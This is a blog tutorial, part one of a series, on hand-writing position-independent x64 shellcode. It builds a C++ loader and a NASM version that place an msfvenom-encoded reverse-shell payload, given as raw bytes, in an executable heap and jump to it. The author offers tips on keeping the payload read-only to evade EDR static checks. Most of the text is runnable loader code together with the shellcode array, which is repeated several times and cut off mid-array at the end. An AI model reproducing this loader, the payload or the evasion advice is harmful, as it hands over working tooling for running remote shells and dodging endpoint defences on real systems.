23 minute read

Have you ever wondered how the popularized PIC (position independent code) actually works? I can answer that question alongside you with a resounding YES! You are exposed to PIC based shellcode constantly in today’s widely used C2 platforms. Then there’s the popular donut utility, which can convert .NET assemblies to PIC friendly shellcode. But what about from scratch, and I mean producing a template in C++ and then wrtiting x64 assembly code modeled after your C++ program? Also why should we? Well, while I admit I can’t find many tutorials for writing PIC from scratch, I found a plethora of definitions and explanations for what PIC accomplishes. I don’t want to reinvent the wheel too much here, so suffice to say, here are the advantages of using PIC in my mind. I’ll also include frustrations in the opinion of yours truly. 😸

  • Necessity for ASLR Compatibility: Modern operating systems employ Address Space Layout Randomization (ASLR) to randomize memory addresses, making fixed-location shellcode unreliable or non-functional; PIC-friendly shellcode avoids absolute addresses, ensuring it executes correctly regardless of where it’s loaded in memory.
  • Enhanced Portability Across Environments: PIC shellcode doesn’t require relocation or patching at runtime, allowing it to run seamlessly in diverse scenarios like buffer overflows, heap sprays, or reflective DLL injection without architecture-specific tweaks, reducing development complexity.

Conversely, PIC is frustrating for these three reasons (and many more I’m sure! 😸):

  • Restricted Data Storage and Access: Unlike non-PIC code, PIC shellcode cannot rely on a static .data section for variables or constants due to potential relocation; developers must push values onto the runtime stack or use relative offsets (e.g., from RSP), increasing code size and complexity while risking stack overflows or alignment issues during execution.
  • Dynamic API Resolution Overhead: Direct imports from DLLs are impossible without base addresses, forcing runtime resolution techniques like walking the PEB/LDR structures or hashing API names, which adds significant instruction count (often 100+ bytes) and can fail in hardened environments with API set restrictions or obfuscation.
  • Limited Control Flow and Branching: Jumps and calls must use relative offsets (e.g., RIP-relative in x64), complicating conditional logic or loops that span large distances; this often leads to longer, less efficient code and errors in position-sensitive constructs like switch statements or error-prone disassembly during debugging.

The C++ Template

So, we’ve got our work cut out for us, eh? Well, I’m here to tell you it’s not so bad. Then again, I write assembly for fun. What’s that say about me? 😆 Let me go ahead and share our C++ template we will be building off of that will eventually execute fully via PIC friendly shellcode. It’s fairly simple in design, and I intentionally coded it that way so this won’t be too difficult a pill to swallow.

We start with our const uint8_t shellcode[]. I set this as read-only, using the const keyword / type qualifier, effectively making the shellcode immutable. This is wise in my opinion as we don’t want EDR to immediately flag us just by glancing at our shellcode. You would be surprised how much making your data read-only helps deter routine checks by EDR, especially static analysis. I’ll keep talking but using the inline comments in the code itself, just FYI in case you want to keep following along as I walk through the C++ code 😸

#include <windows.h>
#include <cstdint>
#include <cstdio>

int main() {
    // ---- 1. Shellcode (rev shell x64) msfvenom encoded ----
    const uint8_t shellcode[] = { 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a, 0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04, 0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53 };


    SIZE_T const size = sizeof(shellcode); //this is simple enough, it just determines the size of our shellcode in bytes

    // Create executable heap (RWX by default)
    // as the comment above states, this is RWX by default.  I'm okay with that for the purposes of this exercise
    // I was originally going to you memory map sections for this first blog post of our series, but heaps don't get the recognition they deserve
    // One drawback to using the heap is it does have a limit to how much data you can toss at it.  Be mindful of that.  Though I'll admit I've never encountered a situation where I had shellcode large enough to fill it.
    HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 
    if (hHeap == NULL) {
        printf("HeapCreate failed: %d\n", GetLastError());
        return 1;
    }

   // SIZE_T bufSize = shellcode size (506 bytes);
    LPVOID pBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, size); //zero out the heap in preparation for our shellcode
    if (pBuffer == NULL) {
        printf("HeapAlloc failed: %d\n", GetLastError());
        HeapDestroy(hHeap);
        return 1;
    }

    RtlMoveMemory(pBuffer, shellcode, size); //move our shellcode into the newly allocated heap

    // 4. Execute!
    ((void(*)())pBuffer)(); //execute it!

     // in case anywhere was curious, the strange function above means:

     // void = doesn't return anything from the function call
     // (*) = pointer to a function.  * means we will be dereferencing
     // () = no arguments passed to the function pointer
     // pBuffer = cast it to the location of our shellcode

    return 0;
}

Go ahead and compile that and then setup your listener for localhost, port 9001. If you do all that you’ll be greeted with a nice reverse shell

image

Now, the fun begins! We need to start converting this to assembly, and then furthermore convert it all the way down to machine code / shellcode. That starts………..NOW!!! 😺

Converting to x64 Assembly

Go ahead and start debugging your code using Visual Studio. Go to Debug in the main menu toolbar, and select step over or press F10 on your keyboard for a nice shortcut. Keep going until you arrive at the HeapCreate API. Also, make sure your disassembly window is visible. Here’s what mine looks like:

image

Notice how we are setting up the parameters for our HeapCreate API before we call it. This goes in a specific order, always:

  • RCX
  • RDX
  • R8
  • R9
  • Uses the stack beyond the R9 register if the API requires more parameters passed to it.
  • Call API

So, what are we doing here exactly? Well, HeapCreate looks like the following:

image

Notice how in the Visual Studio disassembly view, we’re moving 0x40000 into ECX as the 1st parameter. ECX is the x32/x86 REGISTER used exclusively for 32 bit values or 4 bytes (a DWORD). That’s why Visual studio chose ECX instead of RCX.

For the 2nd parameter passed into the API, Visual Studio chose edx (instead of RDX) and sets it to 0 using XOR. Same thing for the 3rd parameter, using r8d (instead of R8), where the d stands for DWORD. Both of these parameters are SIZE_T type values, and Visual Studio chose these for efficiency purposes I’m guessing.

Finally we call the API: call qword ptr [__imp_HeapCreate (07FF6281220F0h)]

here’s what it looks like all together in nasm x64 syntax:

xor  r8d,r8d  
xor  edx,edx  
mov  ecx, 0x40000  
call HeapCreate

Next, you’ll see in the disassembly window the following instruction: mov qword ptr [hHeap],rax

We need to reproduce that in our own assembly code, but adjust it to make it conform to PIC requirements. We don’t have any variables like we do in visual basic (can’t store our heapcreate handle in hHeap). So, I’ll show you how to store our heapcreate HANDLE variable the PIC way 😸 I’m going to subtract our current stack pointer by 72 to be far enough away from our current stack pointer to safely store our return value from when we called HeapCreate. This is to prevent this value from being easily overwritten by other API calls, etc. Once we subtract 72 from our current stack pointer, I store the return value in this location via mov [rsp], rax. Finally, I move back to our original stack pointer location using add rsp, 72. That’s the equivalent method I learned for storing variables in a PIC friendly manner and it’s worked well for me over the years.

sub rsp, 72
mov [rsp], rax
add rsp, 72

With HeapCreate behind us, let’s keep going. Now, we’re going to look at HeapAlloc. Hit F10 a few more times to reach the API and then look at your disassembly window. Here’s mine:

image

and here’s the documentation for this API:

image

You’ll notice we have some interesting values being stored in the R8 register and RCX register. The R8 register is receiving the size of our shellcode in hex, while the RCX register is receiving the handle for when we called HeapCreate. Remember when we subtracted 72 from our stack pointer and moved the RAX value into that location on the stack? that’s the HeapCreate handle value! Now, we’re adding that into RCX.

Here’s what that looks like in nasm x64 assembly. Also, it’s worth mentioning that Visual Studio uses the MASM assembler syntax, whereas I show code in NASM. In nasm, you don’t need the PTR keyword so you’ll see me omit that often when I reproduce the assembly code on the blog.

mov  r8, encoded_shellcode_total ;size of shellcode
mov  edx,8  
mov  rcx,qword [rsp - 72]  
call HeapAlloc

Now, you’re probably asking yourself,”Where did he get the encoded_shellcode_total ? I’ll show you! That’s actually calculated at the very top of my assembly code. Check it out:

;nasm -fwin64 [x64findkernel32.asm]
;ld -m i386pep -N -o x64findkernel32.exe x64findkernel32.obj
; externs: ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib mem_heap_pic.obj -o mem_heap_pic.exe -lkernel32

BITS 64

section .shellstuff rdata read
encoded_shellcode:
db 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a,0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04,0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53
encoded_shellcode_total equ $ - encoded_shellcode

section .data 

section .text
global main

I basically introduce my own custom .SECTION entry called .shellstuff because I can 😸 I then place our reverse shell shellcode in it and make it read only, just like the C++ code.

I calculate the total shellcode using: encoded_shellcode_total equ $ - encoded_shellcode This is PIC frienly btw!

Let’s revisit that API call for HeapAlloc. Now that you know how to calculate the total amount of bytes for our shellcode, you can better understand the visual studio disassebly. Here’s our version of what we could see within Visual Studio for our original C++ code. If we manually calculated the total size, it would be 0x1FA, which is the value shown in the Visual Studio Disassembler.

mov  r8, encoded_shellcode_total ;size of shellcode
mov  edx,8  
mov  rcx,qword [rsp - 72]  
call HeapAlloc

So, we call Heap Alloc and now our Heap has stored enough bytes to hold our shellcode. Next up, a custom assembly loop will be introduced that copies our shellcode into the heap memory location we allocated. 😺

Before we do that, let me show you our PIC friendly assembly code so far, both the code and how it looks in x64dbg. Bear in mind we will eventually remove the externs. I’m just using that to simplify teaching you the basics of how we lay the foundation for PIC assembly code. We’ll get more into how to do this without relying on externs in Part 2. Externs are a way to call the windows API of our choosing without walking the PEB and manually locating the api. In case you were wondering. Ok, here’s our code so far:

; nasm -fwin64 [x64findkernel32.asm]
; ld -m i386pep -N -o x64findkernel32.exe x64findkernel32.obj
; externs: ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32

BITS 64

section .shellstuff rdata read
encoded_shellcode:
db 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a,0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04,0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53
encoded_shellcode_total equ $ - encoded_shellcode

section .data 

section .text
global main

; both of these are conveniently in kernel32.dll ;)
extern HeapCreate
extern HeapAlloc

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0 ; this instruction helps with stack alignment
	
xor  r8d,r8d  
xor  edx,edx  
mov  ecx, 0x40000  
call HeapCreate
sub rsp, 72
mov [rsp], rax
add rsp, 72
xor rcx, rcx
	
mov  r8, encoded_shellcode_total ;size of shellcode
mov  edx,8  
mov  rcx,qword [rsp - 72]  
call HeapAlloc
push rax
pop rdx ; memory address of mapped region of memory

Here’s how everything looks in x64dg:

image

And take a look at our registers RAX and RDX. They are both holding the return value of HeapAlloc. RAX always holds the return value and I popped it into RDX for future use.

image

If you follow that memory location in the dump, you’ll see it’s filled with zeros. This location will soon be populated with our shellcode!

image

Copying our shellcode into the Heap

Hopefully everything has made sense up til this point…and really…hopefully everything keeps making sense! 😆 For this next portion of our PIC assembly and soon to be shellcode template, I could have used memcpy or RtlMoveMemory API to accomplish this. However, that’s yet another API we’d have to track down and it would increase our final shellcode bytes and we want low entropy, always, if we can. In this case we can so let’s roll with it. I’m going to setup a loop that copies our reverse shell shellcode byte by byte into the heap address we created. Here’s what that looks like:


  ;=======================================================================
  ; included the below for context to see how I got RDX and why we need it
  call        HeapAlloc
	push rax
	pop rdx ; memory address of mapped region of memory
  ;=======================================================================

lea rsi, [rel encoded_shellcode]   ; this is the address of our shellcode.  we use relative addressing because of x64 conventions, also PIC friendly!
mov ecx, encoded_shellcode_total   ; this is the total size of our shellcode
mov r14, rdx                       ; move rdx into r14 to jump to it later and execute our shellcode once it's placed in the heap
xor rax, rax                       ; clear RAX
	
chunk_reader:                      ; a label 
    
mov al, byte [rsi]               ; moves a single byte value from the address that holds our shellcode into al, which is the from RAX.  it goes -> RAX(64), EAX(32), AX(16), AL(8)
mov [rdx], al                    ; move this value into our heap address
inc rsi                          ; prepare to load the next byte in our reverse shell shellcode
test rcx, rcx                    ; check if rcx is zero
jz final                         ; jump to the final label if it is (and execute our shellcode)
inc rdx                          ; increase the position of our shellcode each time it's added to the heap
loop chunk_reader                ; keep looping until RCX is zero.  This also decrements RCX for us :)
    
final:
jmp r14                          ; jump to our shellcode!

And because I actually really do care that you understand this, I created a quick 5 minute video explaining it step by step using x64dbg 😸



The Final Code for Part 1

Okay, let’s bring it all together now. Here’s the full code for Part 1 of this series. Again, using externs for our API calls. In Part 2, be prepared! We’re going to manually locate the APIs 😸 no cheating using externs.

;nasm -fwin64 [x64findkernel32.asm]
;ld -m i386pep -N -o x64findkernel32.exe x64findkernel32.obj
; externs: ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32

BITS 64

section .shellstuff rdata read
encoded_shellcode:
db 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 